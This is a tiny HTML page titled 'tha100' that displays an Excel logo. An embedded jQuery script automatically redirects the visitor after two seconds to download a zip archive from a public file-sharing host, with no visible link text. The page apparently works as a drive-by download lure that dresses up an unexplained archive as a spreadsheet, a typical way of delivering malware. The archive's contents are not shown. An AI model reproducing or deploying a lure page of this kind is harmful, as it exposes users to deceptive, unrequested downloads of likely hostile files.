<html>
<head>
<title>tha100</title>
<script src="http://code.jquery.com/jquery-3.2.1.min.js"></script>
<script>
$(function() {
$('a[data-auto-download]').each(function(){
var $this = $(this);
setTimeout(function() {
window.location = $this.attr('href');
}, 2000);
});
});
</script>
</head>
<body>
<center><img src="https://www.computerhope.com/issues/pictures/excel-logo.jpg"></center></img>
<div class="wrapper">
<p>
<a data-auto-download href="https://files.catbox.moe/wsznm2.zip"</a>.</p>
</div>
</body>
</html>